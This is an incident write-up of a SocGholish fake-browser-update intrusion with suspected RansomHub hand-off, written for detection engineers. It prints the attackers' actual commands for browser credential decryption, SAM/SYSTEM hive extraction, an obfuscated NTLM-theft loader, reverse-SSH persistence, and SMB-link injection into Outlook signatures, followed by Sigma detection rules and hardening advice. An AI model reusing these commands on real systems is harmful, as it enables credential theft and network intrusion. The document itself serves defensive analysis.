Published: 1/19/2025* > **High-level Overview:** We will review a **SocGholish** (FakeUpdates) intrusion, which progressed to late-stage activity after a dwell time of roughly 30 days. There was a suspected hand-off to a secondary threat actor, presumably an operator associated with **RansomHub** Ransomware-as-a-Service (RaaS). We are going to review the intrusion with the lense of Detection Engineering. I suspect those in threat hunting/intel have some interest in the full narrative, so I'll attempt to speed through the intrusion at a high level. ## Pre-Delivery / Site Compromise - A Canadian Outdoor magazine WordPress site was compromised - Whether this was a result of compromised credentials or exploited vulnerability with the site or installed plugins is unknown. - Javascript for a traffic distribution system (TDS) was injected into site ## Delivery - User visits the compromised WordPress site (Canadian Outdoor magazine) - User clicks "Update Browser" when prompted - This downloads and promptly executes **Update.js** from Chrome >**Note:** >There was no direct user execution. This was direct from Chrome.exe -> wscript.exe (Update.js) ## Detonation - **Update.js** makes determination whether host is domain-joined - If it is not domain joined, [TA582](https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software") deploys AsyncRat or BOINC Rat - If it is domain-joined (the scenario discussed here) - Invokes discovery commands - Deploys a second stage profiling script - `\AppData\Local\Temp\1\852bf403.js` It then writes the task **\OneDrive Per-Machine Standalone Update Task,** and proceeds to run enumeration commands through the **OneDriveStandaloneUpdater.exe** binary. The TA also performs an injection into **RtkAudUService64.exe** to run four separate discovery commands (i.e. nltest) The initial access broker (IAB) has a foothold established under a single user context with the **OneDriveStandaloneUpdater** binary for issuing Hands-on-Keyboard commands. They likely proceed to hand off access to an affiliate Ransomware-as-a-Service (RaaS) operator. This first spurt of behavior occurred on December 10th to December 13th. Up to this point, all behavior spawned from the following parent processes: - `"C:\Windows\System32\WScript.exe" "C:\Users\username\Downloads\Uрdate.js"` - `"C:\Windows\System32\wscript.exe" "C:\Users\username\AppData\Local\Temp\1\852bf403.js"` - `"C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64\RtkAudUService64.exe" -background` - `C:\Users\username\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe` ### IAB spawned commands #### Discovery / Enumeration ```powershell ipconfig /all systeminfo schtasks /query /fo LIST /v findstr "OneDrive" net accounts /domain net use net user /domain ping -n 1 domain_controller dir C:\users\username\*vpn /s net user username /domain net group "domain users" /domain net localgroup administrators net users /domain net group "Domain Admins" /domain ping -n 1 domain_controller ping domain_controller ping file_share_svr ping domain_controller ping -n 1 server ping server taskkill /f /im onedrivestandaloneupdater.exe taskkill /f /im onedrive.exe tasklist tasklist /v findstr pythonw.exe nltest /domain_trusts nltest /dclist: net group "DOmain Admins" /domain powershell -c "$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]''); $searcher.Filter = '(&(objectCategory=person)(objectClass=user)(mail=*))'; $searcher.PageSize = 1000; $searcher.PropertiesToLoad.Add('mail') > $null; $domains = $searcher.FindAll() | ForEach-Object { $_.Properties['mail'][0] -replace '^[^@]+@', '' }; $domains | Group-Object | Sort-Object Count -Descending | ForEach-Object { '{0,-20} | {1}' -f $_.Name, $_.Count }" powershell -c "$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]''); $searcher.Filter = '(&(objectCategory=computer)(operatingSystem=*Server*))'; $searcher.PageSize = 1000; $searcher.PropertiesToLoad.Add('dnshostname') > $null; $searcher.FindAll() | ForEach-Object { $_.Properties['dnshostname'][0] }" ``` #### Credential Stealing ```powershell powershell -c "$2=((gc "C:\Users\username\AppData\Local\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace '\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" powershell -c "$2=((gc "C:\Users\username\AppData\Local\Google\Chrome\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace '\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" powershell -c dir "$env:APPDATA\Mozilla\Firefox\Profiles\*logins.json" copy "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" C:\Users\username\AppData\Local\0395edg.bin& copy "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\Users\username\AppData\Local\0396chr.bin ``` The TA also performed NTLM hash theft via the [Internal Monologue](https://github.com/eladshamir/Internal-Monologue) tool. ```powershell POWErshell "( NEw-oBJEcT systeM.iO.stREAMReAdEr( ( NEw-oBJEcT SYsTEm.Io.CoMpReSSIOn.DeflAtEsTReAM([SYSTem.Io.meMORYSTREaM][sysTeM.CONverT]::FrOMBAse64STRiNG ( '7Rxrc9u48Xtm8h8QTdqhzjJPkh3Hjc/pKbaSaM6vsZRcW8f1UCIksaFIHh+21TT/...='), [Io.CoMPrEssIoN.CoMPREssIOnMode]::dEcOMprEsS )), [syStem.teXt.eNcOdINg]::AsciI)).ReaDtoeNd( )| & ( $ShElLID[1]+$ShEllId[13]+'X')" ``` ![[cyberchef_internalmonologue.png]] #### Staging ```powershell powershell wget payload "C:\Windows\System32\cmd.exe" /C rename "C:\Users\username\AppData\Local\Temp\1\rad44713.tmp" "853cf503.js" "C:\Windows\System32\cmd.exe" /C copy "C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe" C:\Users\username\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe >> "C:\Users\username\AppData\Local\Temp\1\radC3509.tmp" cmd.exe /c C:\Users\username\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe "C:\Windows\System32\cmd.exe" /C rename "C:\Users\username\AppData\Local\Microsoft\OneDrive\radDB4A6.tmp" "version.dll" "C:\Windows\System32\cmd.exe" /C rename "C:\Users\username\AppData\Local\Microsoft\OneDrive\rad71AEF.tmp" "tmp44BC.dll" curl.exe https://www.python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -o C:\Users\username\AppData\Local\python3.12.zip tar -xf C:\Users\username\AppData\Local\python3.12.zip -C C:\Users\username\AppData\Local\python3.12\ curl.exe https://bootstrap.pypa[.]io/pip/pip.pyz -o C:\Users\username\AppData\Local\python3.12\pip.pyz C:\Users\username\AppData\Local\python3.12\pythonw.exe C:\Users\username\AppData\Local\python3.12\pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location ``` #### Persistence ```powershell schtasks /run /tn "python-pip" schtasks /query /tn "python-pip" /v /fo list powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\username\AppData\Local\Microsoft\OneDrive' -Execute 'OneDriveStandaloneUpdater.exe';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'OneDriveStandaloneUpdater' -Action $a -Trigger $t -Settings $s powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\username\AppData\Local\python3.12' -Execute 'pythonw.exe' -Argument 'popy.py';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'python-pip' -Action $a -Trigger $t -Settings $s ``` ### Switching Hands - Raas Operator enters the scene > Although this was stopped before actions on objective were achieved, I suspect that the operator was associated and had the intent to deploy a RansomHub (RaaS) payload. After a dwell time of roughly 30 days, the presumable ransomware operator proceeds to move laterally with their foothold established from the IAB. #### Discovery / Enumeration ```powershell netstat -a netstat tracert $IPv4 tracert $domain nslookup $domain ipconfig /flushdns tracert yahoo.com ping yahoo.com ping $domain net user $username /domain net user $username net users net localgroup administrators dir \\$netdrive\c$ quser qwinsta /server ``` #### Persistence ```powershell schtasks /create /tn "Update" /tr "ssh.exe -R 7777 -p 443 -o StrictHostKeyChecking=no user@$IPv4" /sc minute /mo 5 /ru SYSTEM schtasks /run /tn "Update" reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{}\InprocServer32" /ve /t REG_SZ /d "C:\Users\username\AppData\Local\Temp\msedge.dll" /f powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\username\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'py1.py';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'fontdrvr1' -User 'System' -Action $a -Trigger $t -Settings $s ``` **Various persistence names were observed as the TA moved laterally. These are some of the naming conventions that were used:** - \fontdrvr1 - \Update - \libffi - \libfi > **Note:** > All observed persistence mechanisms were related to **Reverse SSH** or **proxy clients** written in python, obfuscated with pyobfuscate[.]com #### Email Signature Injection The technique injects a malicious SMB URL (`file://$IPv4/s`) into the email signature. When Outlook renders this signature, it attempts to connect to the specified SMB share. This connection attempt causes the system to send the user's NetNTLM hash to the attacker-controlled server, allowing for potential credential theft or relay attacks. ```powershell powershell.exe  cat $env:APPDATA\Microsoft\Signatures\*.htm powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object { $content = Get-Content -Raw $_.FullName; $updatedContent = $content -replace '</body>', '<img src="file://$IPv4/s"></body>'; Set-Content -Path $_.FullName -Value $updatedContent }" ``` Spoken differently, this would route peer and victim email clients over SMB (Port 445) to dump NetNTLM hashes. This technique allowed the TA to perform [**Email Contact Reconnaissance**](https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers). Think of this conceptually as capturing a WiFi authentication handshake. Read more about this technique [here](https://research.nccgroup.com/2021/01/15/sign-over-your-hashes-stealing-netntlm-hashes-via-outlook-signatures/). #### Credential Stealing ```powershell powershell -c "$2=((gc "%localappdata%\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)..." copy "%localappdata%\Google\Chrome\User Data\Default\Login Data" C:\programdata\0396chr.bin copy "%localappdata%\Microsoft\Edge\User Data\Default\Login Data" C:\programdata\0395edg.bin vssadmin list shadows certutil -encode \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1255\windows\system32\config\security c:\se1.txt certutil -encode \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1255\windows\system32\config\system c:\sy1.txt certutil -encode \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1255\windows\system32\config\sam c:\sa1.txt ``` #### Covering Tracks / Evasion ##### Artifact Removal ```powershell del c:\programdata\0395edg.bin del c:\programdata\0396chr.bin del C:\Programdata\domain_1.txt del C:\Programdata\domain_2.txt del C:\Programdata\server.txt ``` ## Swapping Lenses ![[they_live.png]] Now that we have gotten passed the narrative for the threat intelligence folks, lets change focus to cutting off future infections at the knees. The unfortunate reality is that Detection Engineering is often nuanced, and rules that function in some environments cannot universally be applied. These ideas are taking the perspective of an intrusion that impacts a Fortune 500 company, and this likely will have minimal takeaways from the EDR vendor perspective. I've learned a few recurring themes over the past several months: - Do not compete with your EDR - Complement the detection stack with hardening - There is a limited amount of detection rules (bullets) to fire - Every detection has an imposed cost, both in response time and maintenance This said, let's pivot to detection opportunities. ## Hunting / Detection Opportunities ### Detection 1: Targeting Delivery --- Targeting initial access has always been a favorite of mine. In my opinion, this is where detection engineering has the highest reward output. There are a limited number of ways into a network, and the bad actors have to get increasingly more creative. ![[initial_access.png]] As explained above, the delivery required minimal user interaction, making these Javascript (JS) based campaigns particularly insidious for corporate environments where the default Windows systems default-open JS with wscript.exe. Flag on script hosts or shell sessions spawning from the browser ```yaml title: Browser Spawning Script or Shell Execution id: 123e4567-e89b-12d3-a456-426614174001 description: Detects browsers spawning script hosts or shells, indicative of IAB delivery like SocGholish Update.js. status: experimental author: bencrypted date: 2025/01/19 logsource: category: process_creation product: windows detection: selection: ParentImage|contains: - 'chrome' - 'msedge' - 'firefox' - 'chromium' - 'vivaldi' - 'iexplore' - 'opera' - 'brave' Image|endswith: - '\wscript.exe' - '\cscript.exe' - '\powershell.exe' - '\powershell_ise.exe' - '\pwsh.exe - '\mshta.exe' condition: selection fields: - ParentImage - Image - CommandLine falsepositives: - Legitimate browser extensions or IT scripts level: medium ``` While the main goal of this was to catch the execution of **wscript.exe** (Update.js) directly from a browser process, I was able to scope out additional executions that could be deemed suspicious or compliance policy issues with minimal noise. >**Note:** You may notice that *cmd.exe* is missing. Unfortunately, there is far too much noise in most environments to hone in on *cmd.exe* directly, without some extreme filtering. This may be feasible in a small and medium-sized business, however it was not achievable in my specific environment. ### Detection 2: Output Piped to temporary (.tmp) files --- Nearly all commands from the IAB forwarded data (`>>`) to .tmp files under `%AppData%` - parent.process.name: - `"C:\Windows\System32\WScript.exe" "C:\Users\username\Downloads\Uрdate.js"` - process.cmdline: - `"C:\Windows\System32\cmd.exe" /C net accounts /domain >> "C:\Users\username\AppData\Local\Temp\1\rad0BC6C.tmp"` While this may technically violate the lesson of competing with your EDR, there is potential to flag on this behavior more broadly with the context of it being [**Suspicious Here**](https://medium.com/@vanvleet/identifying-and-classifying-attack-techniques-002c0c4cd595). EDR vendors typically have rules in place targeting piped output to temporary files under `%AppData%` via specific script hosts such as `wscript.exe`. However, given that we don't have to inherently worry about false positive ratios from tens of thousands of organizations, we can baseline this behavior across our environment and cast a wider net. This said, we could proceed with querying our environment for historical data with something resembling this search: ```yaml title: Script Host Piping Output to Temporary Files id: 987fcdeb-12ab-34cd-56ef-426614174002 description: Detects script hosts spawning processes that pipe output to .tmp files, common in IAB staging. status: experimental author: bencrypted date: 2025/01/19 logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: - '\wscript.exe' - '\cscript.exe' Image|endswith: - '\cmd.exe' - '\powershell.exe' - '\powershell_ise.exe' - '\pwsh.exe' CommandLine|contains: '>>' CommandLine|contains: '.tmp' condition: selection fields: - ParentImage - Image - CommandLine falsepositives: - Legitimate scripts redirecting output level: medium ``` In this scenario, my specific environment was not active with behavior piping data to the `.tmp` files, and getting more granular with the `%AppData%` directory was not necessary. I could also broaden the scope further with both parent or child processes. That said, intrusions like these play a wonderful role in back-testing our existing rules, querying true positive data, and evaluating new detection logic. Never let a crisis go to waste. ### Detection 3: Clustering Endpoint Enumeration and Discovery --- The general idea is to perform a correlation search / query that clusters behavior over 10 minute interval with enumeration commands. ```yaml title: clustered endpoint enumeration (edr-disco-proc-endpoint-enum) id: b23fcdeb-78g9-81bc-d5fg-426614174007 description: "correlation rule flagging discovery commands from cmd.exe or powershell spawning systeminfo.exe, whoami.exe, ipconfig.exe, nltest.exe, or net.exe, requiring two matches within a 10-minute window" status: experimental author: ben date: 2025/01/20 logsource: category: process_creation product: windows detection: selection_discovery_1: ParentImage|endswith: - '\cmd.exe' - '\powershell.exe' - '\powershell_ise.exe' Image|endswith: - '\systeminfo.exe' - '\whoami.exe' selection_discovery_2: ParentImage|endswith: - '\cmd.exe' - '\powershell.exe' - '\powershell_ise.exe' Image|contains: '\ipconfig' CommandLine|contains: '/all' selection_discovery_3: ParentImage|endswith: - '\cmd.exe' - '\powershell.exe' Image|endswith: - '\nltest.exe' - '\net.exe' CommandLine|contains: - 'view /all' - 'config workstation' - 'get displayname' - 'domain_trusts' - 'domain computers' - 'domain admins' filter_exclusions: CommandLine|contains: - 'Nexthink' ParentImage|endswith: - '\nxtcod.exe' - '\taskeng.exe' - '\runonce.exe' condition: ((selection_discovery_1 or selection_discovery_2 or selection_discovery_3) and not filter_exclusions) | count() by host > 1 | timeframe 10m fields: - Image - ParentImage - CommandLine falsepositives: - legitimate administrative diagnostics - system inventory scripts level: medium tags: - attack.discovery - attack.t1018 - attack.t1069 ``` Simulating this query logic against 90 days of historical data flagged on only the red team and a single true positive intrusion. But remember, detection engineering isn't a one-size-fits-all. This specific logic might not work for many other environments. It's all about tailoring your approach to your unique setup. For instance, in my environment, the commands `ipconfig /all` and `net localgroup Administrators` were frequently called by a wide variety of agents, causing multiple false positive alerts to fire in a day. It's all about determining the appropriate amount of coverage versus noise. ### Detection 4: Scheduled Task Abuse --- Most large enterprises have too much noise to flag on scheduled task creation, however persistence is great to identify in the event that other points of visibility are missed in the fog. For this reason, EDR vendors cannot broadly alert on the creation of persistence. This query is meant to flag on a number of criteria. Whether PowerShell directly creates a scheduled task or the schtasks binary is called directly, it will flag. It searches for stated time intervals for the schtasks binary, and this hones in on a variety of script hosts, shell sessions, file downloads, and calling environment variables directly. During the evaluation process, this query was applied to historical data from the intrusion. The results indicated that it would have successfully identified suspicious activity on three separate systems with no false positives over a 90 day period against an upwards of 50,000 endpoints. ```yaml title: Suspicious Persistence via Scheduled Tasks or PowerShell id: 789cd012-56ef-78gh-90ij-426614174016 description: Detects persistence attempts via scheduled tasks or PowerShell from unverified or suspicious parent processes. status: stable author: bencrypted date: 2025/02/19 logsource: category: process_creation product: windows detection: parent_filter: # Parent process conditions: unverified signature or specific names ParentCodeSignature|notin: - 'valid' - 'verified' ParentImage|endswith|all: - '\cmd.exe' - '\wscript.exe' - '\cscript.exe' - '\rundll32.exe' - '\regsvr32.exe' - '\wmic.exe' - '\mshta.exe' - '\powershell.exe' - '\pwsh.exe' - '\powershell_ise.exe' - '\wmiprvse.exe' - '\wsmprovhost.exe' - '\winrshost.exe' ParentOriginalFileName|endswith: - 'Command Prompt' - 'Microsoft ® Windows Based Script Host' - 'Microsoft ® Console Based Script Host' - 'Windows host process (Rundll32)' - 'Microsoft(C) Register Server' - 'WMI Commandline Utility' - 'Microsoft (R) HTML Application host' - 'Windows PowerShell' - 'PowerShell' - 'Windows PowerShell ISE' - 'WMI Provider Host' - 'Host process for WinRM plug-ins' - "Host Process for WinRM's Remote Shell plugin" parent_exclusion: ParentImage|endswith: - '\gpscript.exe' - '\msiexec.exe' - '\author-nvm.exe' - '\deploy-application.exe' persistence_schtasks: Image|endswith: '\schtasks.exe' CommandLine|contains|all: - ['/create', '-create'] CommandLine|contains: - 'once' - 'minute' - 'hourly' - 'daily' - 'onlogon' - 'onstart' CommandLine|contains: - 'curl' - 'wget' - 'downloadstring' - 'get-itemproperty' - 'cmd.exe /c' - 'powershell' - 'pwsh.exe' - 'mshta' - 'wscript' - 'cscript' - 'rundll32' - 'ssh' - 'python' - '$env:' persistence_schtasks_xml: Image|endswith: '\schtasks.exe' CommandLine|contains|all: - ['/xml', '-xml'] CommandLine|contains: - 'c:\windows\temp\' - 'c:\temp\' - '\perflogs\' - '\users\public\' CommandLine|contains|not: - '.xml' persistence_powershell_base: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - 'New-ScheduledTaskAction' persistence_powershell_suspicious: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains|all: - 'New-ScheduledTaskAction' - ['curl', 'wget', 'downloadstring', 'get-itemproperty', 'cmd.exe /c', 'powershell', 'pwsh.exe', 'mshta', 'wscript', 'cscript', 'rundll32', 'ssh', 'python', '$env:'] condition: (parent_filter and not parent_exclusion) and (persistence_schtasks or persistence_schtasks_xml or persistence_powershell_base or persistence_powershell_suspicious) fields: - ParentImage - Image - CommandLine - ParentCodeSignature falsepositives: - Legitimate scheduled tasks or scripts by IT admins level: high ``` ### Detection 5: Leveraging Built-in Alerts --- A detection strategy's effectiveness ultimately hinges on the reliability of your data sources. In this scenario, we encountered significant asset visibility challenges with a tool designed to parse, monitor, and alert based on Windows event logging. Given the substantial gaps in logging from domain controllers, I deployed a complementary rule leveraging the EDR layer, which alerts on built-in platform logic such as **LDAP Kerberoastable SPNs**, **Powersploit Kerberoast**, and **Many SPN Requests With Rubeus Ldap Query**. This new rule provides comparable coverage for detecting Kerberoasting attacks, ensuring we maintain security monitoring despite limitations in our primary logging system. ### Mapping via Canvas ![[infection_canvas.png]] ### Detection Wrap Up I'm certain there are plenty of additional takeaways one could make from this intrusion. In the same way that a picture is worth a thousand words, an intrusion could rack up its fair share of post-mortem detection rules. There will always be more opportunities to flag on. For instance, I didn't even touch on flagging the email signature injection, SMB traffic from an email client, file modification of browser credentials (Login Data), querying for registry keys (Terminal Server Client), etc. Some rules are more precise, focusing on specific behaviors with high accuracy but potentially missing some incidents. Others have more recall, casting a wider net to catch more potential threats but possibly including false positives. The list of both ideas and considerations goes on, but I hope this at least opened up some of the thought process behind Detection Engineering. It's an ongoing process of refinement and adaptation, always seeking to stay one step ahead of evolving threats. ## Hardening I'll separate by priority for these recommendations. With priority 1 items, these will be ease of implementation and large impact, while priority 2 may require a little more complexity, grunt work, and advocacy to push forward. ### Priority 1 - Default-open [script files](https://gist.github.com/ChuckFrey/7f77df907a53309ca5d30387989ff143) with [notepad.exe](https://redcanary.com/blog/threat-intelligence/notepad-javascript/) - Block SMB traffic at network boundaries - Enforce SMB signing and encryption - Disable NTLMv1 authentication ### Priority 2 - Enable SMB 3.0 or later for improved security features - Transition from NTLM to Kerberos authentication - Implement DNS-based ad blocking (DNS sinkholing) - Force Always-On VPN - Ensure Firewall/VPN security mitigations are in play - Endpoint Detection Response Management - Agents must be monitored for good health - Agents kept closely following the released update if not set to Auto-Update - Block script and remote Powershell executions from non-administrators - Deploy browser isolation technologies Sometimes the most simple mitigations are the best. These measures create multiple layers of defense, making it more challenging for threat actors to succeed and reducing the burden on our end users. ## Acknowledgements Special thanks go out to monitorsg for helping understand the infection stages in detail, along with RussianPanda for pointers on decoding an obfuscated proxy client script! ## References - [Identifying and Classifying Attack Techniques](https://medium.com/@vanvleet/identifying-and-classifying-attack-techniques-002c0c4cd595) - [Prioritizing Detection Engineering](https://medium.com/starting-up-security/prioritizing-detection-engineering-b60b46d55051) - [Balancing Act: Coverage vs Cost](https://medium.com/@vanvleet/the-threat-detection-balancing-act-coverage-vs-cost-cdb71d21412f) - [eSentire detailing Email Signature injection](https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers) - [GuidePoint Security detailing RansomHub observations](https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/)